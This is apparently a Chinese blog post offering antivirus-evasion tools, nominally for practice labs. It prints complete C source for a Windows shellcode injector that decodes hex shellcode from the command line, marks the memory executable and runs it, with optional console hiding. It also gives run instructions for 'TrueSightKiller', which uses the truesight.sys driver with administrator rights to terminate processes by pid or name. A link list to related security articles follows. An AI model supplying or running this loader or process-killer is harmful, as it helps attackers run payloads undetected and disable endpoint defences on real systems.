靶场专用免杀工具

工具
SimpleShellcodeInjector

代码

bash 复制代码
#include <stdio.h>
#include <Windows.h>
int main(int argc, char* argv[]) {
   // HWND hWnd = GetConsoleWindow();
   // ShowWindow( hWnd, SW_HIDE );
    unsigned int char_in_hex;
    char* shellcode = argv[1];
    unsigned int iterations = strlen(shellcode);
    unsigned int memory_allocation = strlen(shellcode) / 2; 
    for (unsigned int i = 0; i < iterations - 1; i++) {
        sscanf(shellcode + 2 * i, "%2X", &char_in_hex);
        shellcode[i] = (char)char_in_hex;
    }
    void* exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE);
    memcpy(exec, shellcode, memory_allocation);
    DWORD ignore;
    VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
    (*(void (*)()) exec)();
    return 0;
}

TrueSightKiller

自行编译后,将truesight.sys与编译之后的exe放在同一目录下,以管理员权限运行cmd

-p 指定pid,-n指定进程名


相关推荐
网安INF21 分钟前
网络攻防技术:网络安全攻击概述
安全·web安全·网络安全·网络攻防
深盾安全2 小时前
C++实战:快速提取Android APK数字签名
安全
white-persist2 小时前
SQL 注入详解:从原理到实战
前端·网络·数据库·sql·安全·web安全·原型模式
AORO20252 小时前
防爆手机与普通手机的区别!
网络·5g·安全·智能手机·电脑·信息与通信
携欢3 小时前
Portswigger靶场之Exploiting a mass assignment vulnerability通关秘籍
前端·安全
嗨丶王哪跑3 小时前
网络安全审计技术原理与应用
运维·网络·安全·web安全
auto-mooc5 小时前
到底什么是智能网联汽车??第四期——汽车通信系统应用及开发
安全·汽车
陈皮05276 小时前
Linux系统提权
安全
Digitally6 小时前
如何处理旧 iPhone:安全地回收或重新利用
安全·ios·iphone
瀚高PG实验室7 小时前
HGDB集群(安全版)repmgr手动切换主备库
java·数据库·安全·瀚高数据库